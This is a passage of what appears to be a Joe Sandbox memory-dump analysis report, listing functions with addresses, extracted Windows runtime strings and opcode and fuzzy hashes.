@, xrefs: 01995445
@, xrefs: 019955A3

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 615894139b1a0937927f47eb8b5c84bf1b5b82ab399314f7f5bfe64845e13fb0
Instruction ID: c03c9278c27655153f7a1a62254cb65b2fc53e393b61b0b599cd0766304b17aa
Opcode Fuzzy Hash: 615894139b1a0937927f47eb8b5c84bf1b5b82ab399314f7f5bfe64845e13fb0
Instruction Fuzzy Hash: D6328E705083118BEB26CF1DC484B3FBBE9AF94745F15491EFA899B290E734D984CB92

Function 01A4A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01A4A551
`, xrefs: 01A4A44B

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 8df248991102378b9e8f7770df82ca86b51ed27eb1fd88dc8e68d13698fd1f17
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 4FC1D2312443429BEB25CF28C941B6BBBE5BFC4318F084A2DF69ACB291D774D505CB82

Function 019804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 01980540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0198063D

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: e78284fcf51d1c9986e3f5fbfdc89f85d22517dacddad4dcaa6067cbb910cdf4
Instruction ID: ee0fcb4285b97d27dc73028129ee505f1ebbc10aab9243d82ad772d18a69d4d0
Opcode Fuzzy Hash: e78284fcf51d1c9986e3f5fbfdc89f85d22517dacddad4dcaa6067cbb910cdf4
Instruction Fuzzy Hash: 3551CF715007468FD724EF29C4406A7BBE8AF84309F18493EFA9D87241E730D549CBA2

Function 0198A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0198A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0198A2FB

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 28658a9502759c65830db4d4b120490dba1612e23ddb4cde9746664884318248
Instruction ID: eb50b4383db417738b0ddd70053ee1cc715b7556b45ac16dc623955ff5bf29a2
Opcode Fuzzy Hash: 28658a9502759c65830db4d4b120490dba1612e23ddb4cde9746664884318248
Instruction Fuzzy Hash: 6F41AF30A04649DFDB26DF69C444F6D7BF8FF85701F1844AAE908DB291E275D900CB50

Function 01A135BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 01A135EC
LdrResGetRCConfig Exit, xrefs: 01A135FE

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: c05c5bdbfbe032a5d969ce47a4859ffd80c8c32eda81c4feffd8056e1ee1d02b
Instruction ID: 14aeb47db337eb5cc58522141e8f56adbf5406684c306454e7131ab4fcdc0af6
Opcode Fuzzy Hash: c05c5bdbfbe032a5d969ce47a4859ffd80c8c32eda81c4feffd8056e1ee1d02b
Instruction Fuzzy Hash: D931BE312087429FE711DF29D854B2BBBE4FF85724F080869F9A48B394EB34D905CB92

Function 019B329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

.Local\, xrefs: 019B32B5
@, xrefs: 019B330D

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 77e7b5d53da83f58145d3349ae33fc94fef043062033e4f27d71a77d7c825f7a
Instruction ID: 68182cf9d7c9b44d5b06d8310d71794adec4d36bc7017d64af615cc1ca4ada51
Opcode Fuzzy Hash: 77e7b5d53da83f58145d3349ae33fc94fef043062033e4f27d71a77d7c825f7a
Instruction Fuzzy Hash: 5F31A1B25097059FD711DF28C9C0A9BBBE8FBC5654F84092EF99983310DA30DE04CB92

Function 019B34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 019F2A95
RtlpInitializeAssemblyStorageMap, xrefs: 019F2A90

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: 23f87ef0083fbf09a8f518a6d46b1d78127eab0294319bf4f1f544c6b3f8036e
Instruction ID: 7644cf51776278eafd1c3cd743054db826860898e1c41c884c6064ffecbe51de
Opcode Fuzzy Hash: 23f87ef0083fbf09a8f518a6d46b1d78127eab0294319bf4f1f544c6b3f8036e
Instruction Fuzzy Hash: FB110A75700205BBF726CA4C8E81FAB76AEAB94F54F15802D7A0CEB280D674CE0083A0

Function 019BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 019BA5E4
Threadpool!, xrefs: 019BA5E9

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: f9c489b311dcc47390dde36b1c289e1b4afe44d9368d23b31dc761da31f9815c
Instruction ID: 7aa7f2e95ef77aef936f8da0cb0599b9cda18bfcd924261cf85ea58fe6935ca7
Opcode Fuzzy Hash: f9c489b311dcc47390dde36b1c289e1b4afe44d9368d23b31dc761da31f9815c
Instruction Fuzzy Hash: 6201ADB2240704EFE311DF14CE85B567BE8E794B15F01893DA64CC71A0E734E904CB46

Function 01987370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3e6c1a724fe217b625054e19143acc1279df5b9c878cddf473fc14dfc56b38
Instruction ID: 7d8e04b97d0e9c4c928b0a1c04832a1ab113a74dab125aaa805aced056f2f25c
Opcode Fuzzy Hash: dd3e6c1a724fe217b625054e19143acc1279df5b9c878cddf473fc14dfc56b38
Instruction Fuzzy Hash: ADA17E71608742CFC725DF68D480A2ABBFAFF98704F24492EE58987351E730E945CB92

Function 01A06420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 01A065C1

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: a3ad22fec9628111e3eb7a489622b635c1ce56a011a5ea6285afca8b7477c03a
Instruction ID: fb1e5d0a44cb9f64a4e52c70a794843a3b1d5b07416ed81f1d83ee798236413f
Opcode Fuzzy Hash: a3ad22fec9628111e3eb7a489622b635c1ce56a011a5ea6285afca8b7477c03a
Instruction Fuzzy Hash: 7591A471900219AFEB22DFA8DD85FAE7BB8EF44B54F100055F608AB1D0D775AD04CBA0

Function 0197B136 Relevance: 1.4, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

0](, xrefs: 0197B1C0, 019DCE47

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: 0](
API String ID: 0-115492709
Opcode ID: 60097c9772df840e20cd461466e07ba11a960f7fa580e517e7ba8f3f1d00af92
Instruction ID: a8da8491c850409809cacb7cd785ad687536f23e37c7615054af6a897556cc75
Opcode Fuzzy Hash: 60097c9772df840e20cd461466e07ba11a960f7fa580e517e7ba8f3f1d00af92
Instruction Fuzzy Hash: A041A2B1641602EFDB22EF69C980B5ABBE8FFA0754F008469E51EDB250D770DD00CB90

Function 01A3B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 01A3B28F

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: 5e9ce6d3d0fa9fd7fc18dabb426bc1200d86479c676518aca7a1a2ea3c4dc72a
Instruction ID: 4d362e7cdf0c702b0230a1ffb2f72323a5d4d274f8a0150bf482a33cb612d82c
Opcode Fuzzy Hash: 5e9ce6d3d0fa9fd7fc18dabb426bc1200d86479c676518aca7a1a2ea3c4dc72a
Instruction Fuzzy Hash: 55418272D00229AFEB11DB99C840BEEBBBAAFC4750F05416AFE15A7650D674DE40C7B0

Function 01A2705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 01A270A4

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: 8ccf97fd217f853118aa9e3ce67f033c0dfbf62c5a80af71bed34824c6665f44
Instruction ID: b6938a2bf9ee1ac1525b2e7fbc9e77c2bbe3a3a2b694a4a5ff52c31a3d692d2d
Opcode Fuzzy Hash: 8ccf97fd217f853118aa9e3ce67f033c0dfbf62c5a80af71bed34824c6665f44
Instruction Fuzzy Hash: E0417B355017628BF731ABBCED44BA53FA4BB90B24F24011DED588A0D5CB74478BC7A1

Function 019B7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 019F4622

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: 978129ba019f582836a59b8269f8e73e2151f78a1f775db01e1ef8f8ba7f9fe9
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: 9A41D135A0065AEBDF258F88C590BFEB7B8EF84702F00455AE94997280D770D941CBA1

Function 01985096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 019850BF

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 0eb574ef59fcec12853a48c7dfff13fe1129dc1611d81ded7559a97ce6a5339b
Instruction ID: b257059082d40321d11b12f3c483eba998773b8f09b7141335f95fcaf7fc5fc8
Opcode Fuzzy Hash: 0eb574ef59fcec12853a48c7dfff13fe1129dc1611d81ded7559a97ce6a5339b
Instruction Fuzzy Hash: 0A11E6303082028BFB256D0CC850A76B7D9FB81225F36892AE59ECF391D671DC46C381

Function 01A0106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 01A010F7

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: 8f02ae2f4e2f28396d1cc33ac0eae08dd19111866f1bda349bd0a47cdb8af7dd
Instruction ID: 098bbcba95685449c831195aa5f2941e04de20fbff40d022a4b41e33052c11c6
Opcode Fuzzy Hash: 8f02ae2f4e2f28396d1cc33ac0eae08dd19111866f1bda349bd0a47cdb8af7dd
Instruction Fuzzy Hash: 2A2104B15183449FC321DF1AD845A9BFBE8FFD5B50F004A1EB99497250D7B0D505CB92

Function 019D739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f09a8630f06b3a180769a765c6134f637b6b1ef9310a3d77247a216689b0e38
Instruction ID: 994cbba42a1ffedd51547e14c88addc174c3c3c6d319fb09a4557fa82d77bd2a
Opcode Fuzzy Hash: 0f09a8630f06b3a180769a765c6134f637b6b1ef9310a3d77247a216689b0e38
Instruction Fuzzy Hash: C142C071A006168FDB19CF9DC480ABEBBB6FF88319B14C55DD95AAB340D734E842CB90

Function 019AB2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c6760fe1a8effdd04bd3d2af8582e9fce315a498f1f10d28006392ad585ae2
Instruction ID: 68f1634b68e1481906ba764c60108a4bbb49424ee6f1ecad75358ba7beb23ffe
Opcode Fuzzy Hash: c8c6760fe1a8effdd04bd3d2af8582e9fce315a498f1f10d28006392ad585ae2
Instruction Fuzzy Hash: F932B175E00219DBDF14DFA8C894BEEBBB5FF94714F580029E80AAB381E7359905CB91

Function 01A18158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b217f31da1416b25af30a5d8dc8190129b687fdfdbb22dfe049424fab57c874
Instruction ID: c10435a569a13183b5ff8d606274a39656c1d7573c8b8907c902b072ca4349f1
Opcode Fuzzy Hash: 9b217f31da1416b25af30a5d8dc8190129b687fdfdbb22dfe049424fab57c874
Instruction Fuzzy Hash: E9425075E002199FEB25CF69C841BADBBF5BF88300F188199E94DEB246D7389985CF50

Function 01A2A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 921cdc114b5e92e3be27c433d96f4dc35d59642298fb5e25ffcc831f3b15b70b
Instruction ID: d63e7e562c888ab4511a31f1f2dfd675649d756292fadee86214755abef51289
Opcode Fuzzy Hash: 921cdc114b5e92e3be27c433d96f4dc35d59642298fb5e25ffcc831f3b15b70b
Instruction Fuzzy Hash: 9022CF742046718FEB25CF2DC094372BBF1AF45300F18889AE996CFA86E735E452DB64

Function 019865D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7765d342ca859a7ba066e8d086041ef97f644eef2fcb5192442d85787d5788f0
Instruction ID: b5408d9c4c7c8cedaa44fbf364591ae5202bd71e0f6bdbcbcb19563e9f0cd312
Opcode Fuzzy Hash: 7765d342ca859a7ba066e8d086041ef97f644eef2fcb5192442d85787d5788f0
Instruction Fuzzy Hash: 26E18071608342CFC715EF28C490A6ABBE5FF89314F05896DE9998B351EB31E905CB92

Function 01978397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fe162261e280c01ad0675126f2a569f15fc7dfc0d5f33df382613db2e4bd308
Instruction ID: 5579703dc5a1d39e26c056be20065477fc958d3a4502c22347174fe646838030
Opcode Fuzzy Hash: 8fe162261e280c01ad0675126f2a569f15fc7dfc0d5f33df382613db2e4bd308
Instruction Fuzzy Hash: 0AD1F271A0020A9BDB14DF69C894FBEB7A5BF94714F058A2DEA1EDB280E730D950CB50

Function 01990535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 42c5c4eb3653642ad46398921fd1ba9a3b40008c93126053196e1382bdba2f28
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: A7B10831600646EFDF16CB6DC854BBEBBFAAF84300F194559E66AD7281D730E941CB90

Function 019A90DB Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6de207f35b0050d3502751f5efa4be0d766a982c1028bf10c2dc0c5a9b4d4bf9
Instruction ID: b8bad45db68e885cff0f2d1fd4eb575e4bc41d3985b0e85cc4e0eb56cbee1598
Opcode Fuzzy Hash: 6de207f35b0050d3502751f5efa4be0d766a982c1028bf10c2dc0c5a9b4d4bf9
Instruction Fuzzy Hash: 32A15C71900616AFEF22DFA8CC45FAE7BB9EF85754F010054FA08AB2A0D7759D11CBA0

Function 019883C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b59b691fd3a2b95e7a3f5ee2cae5080d8189613fdf416eeea792af58155bc6a
Instruction ID: db6e6ecba58e26da1e89be1bf6278ed5255760698ae9848f106a95b499b7137f
Opcode Fuzzy Hash: 7b59b691fd3a2b95e7a3f5ee2cae5080d8189613fdf416eeea792af58155bc6a
Instruction Fuzzy Hash: A9C17774608341CFE764DF18C494BABB7E9BF88704F44496DE98987291E774E908CFA2

Function 0197C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a7ca87d03a1664a3f1af3b1bc17c4da8507dec37f057ea605fb81e5fe79a569
Instruction ID: 20d49516880d82d35f72b74405e95ed15b84d5d0c4cb948e7b764c7c9a532f7d
Opcode Fuzzy Hash: 3a7ca87d03a1664a3f1af3b1bc17c4da8507dec37f057ea605fb81e5fe79a569
Instruction Fuzzy Hash: C1B17170A042668BDB24CF68C890BADB7F5EF84704F0485E9D54EEB281EB71DD85CB21

Function 019AE5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b1f9ecdd063dfc6b95d08ae43213937f5fa03ba9696bf7dd90b6a9e58d9f5d5
Instruction ID: cce3aa701a8432023a6778e59d04f234af9f2983aab7787311fbd7b54b975db7
Opcode Fuzzy Hash: 0b1f9ecdd063dfc6b95d08ae43213937f5fa03ba9696bf7dd90b6a9e58d9f5d5
Instruction Fuzzy Hash: 6DA12731E006199FEB22DB6CC848FAEBBF8AF44714F150526EA08AB2D1D7749D45CBD1

Function 019C0185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7576651b1b23b81f8fdb9f339b2d7ab629c798906ce8c8e771f9cd161c3306c0
Instruction ID: d4c18b36dcb4a327f106e48ddd4dbf69dd9f00be7afca377a87a9fa89b26c9f0
Opcode Fuzzy Hash: 7576651b1b23b81f8fdb9f339b2d7ab629c798906ce8c8e771f9cd161c3306c0
Instruction Fuzzy Hash: 0AA1D374B00616DFDB25DF69C890BAAB7B5FF44B19F08402DFA8997281EB34E811CB51

Function 01A54500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5bc63a0c2f5ce3a51c7aaa23dd1d9000149ce8461a12e2e093d2845205033f2
Instruction ID: c9ec52302627d4c70c2d0d096cf50beb193ffeab8ae59e4403fb4b8452cf5bab
Opcode Fuzzy Hash: e5bc63a0c2f5ce3a51c7aaa23dd1d9000149ce8461a12e2e093d2845205033f2
Instruction Fuzzy Hash: 2FA1D172A08601EFD756DF28C980B5ABBE9FF98704F450528F989D7651E330ED81CB91

Function 01A060E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5abfc3457a10a3b9285358babfbde0256225f41577da06d0e5e8a8ce1384616
Instruction ID: 72061d19e3558a89491193d999b1eb9870b306dcca3037864bbd26f3539b33d0
Opcode Fuzzy Hash: a5abfc3457a10a3b9285358babfbde0256225f41577da06d0e5e8a8ce1384616
Instruction Fuzzy Hash: D791A471D00216AFDF16CFA8E894BBEBFB5AF48714F154169E618EB381D734D9108BA0

Function 0199E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 523a35a2b8f32b1c134cd9bcf0974bd775b40aea591e70535eb8ab807fec2844
Instruction ID: 53b7b61829ded20f7224a6a97a8168a374f17e1f9db4747fa993cc4414d616dc
Opcode Fuzzy Hash: 523a35a2b8f32b1c134cd9bcf0974bd775b40aea591e70535eb8ab807fec2844
Instruction Fuzzy Hash: 8A914131A00616DBEF25DB2DC884BBEBBE5FF94B15F048469E90D9B380E634D901C792

Function 01981131 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2ed1b9d7c7b4db483b5d00d750e0828d4d7ad522874963690b0f81b07862727
Instruction ID: 0ebb7bc51961619b34f49605aafadc1803f7e931e5084fbb2de8d1afc963f7b8
Opcode Fuzzy Hash: e2ed1b9d7c7b4db483b5d00d750e0828d4d7ad522874963690b0f81b07862727
Instruction Fuzzy Hash: 71B113B56093418FD755CF28C580A6AFBF1BB88704F18896EF99AC7352D331E946CB42

Function 01989486 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb3d29860cc91c5f5d0a6a7b894d09e478ab6e696361de052a1d531961e463b0
Instruction ID: 821ac9a9a87ac1948ee0b4eb0ec36644b38d387e520f2610e1d09ac3e5e11df6
Opcode Fuzzy Hash: bb3d29860cc91c5f5d0a6a7b894d09e478ab6e696361de052a1d531961e463b0
Instruction Fuzzy Hash: 18B17C74A00205CFDF25EF2CD484BB9BBB4BB8871DF248559DC299B296D731D942CBA0

Function 01A3B52F Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
Instruction ID: 15e75a35e5f05d192c354e9687d11a10d8aa53f73069df51c1b7bed81f4041cf
Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
Instruction Fuzzy Hash: 5C719F35A0221A9BDB21CF68C581BBEBBF7EF84750F59411AF901EB241E734D9418BB0

Function 019AD090 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction ID: eec9b44dad36efdeb0f49429426df3cc76e1f6ce96de175b6890c6c987ffe39f
Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction Fuzzy Hash: 5A817072E0011A8BDF1ACF9CC884BADBBF2FB84315F19456AD91DB7344D631A9448BD1

Function 019BE284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
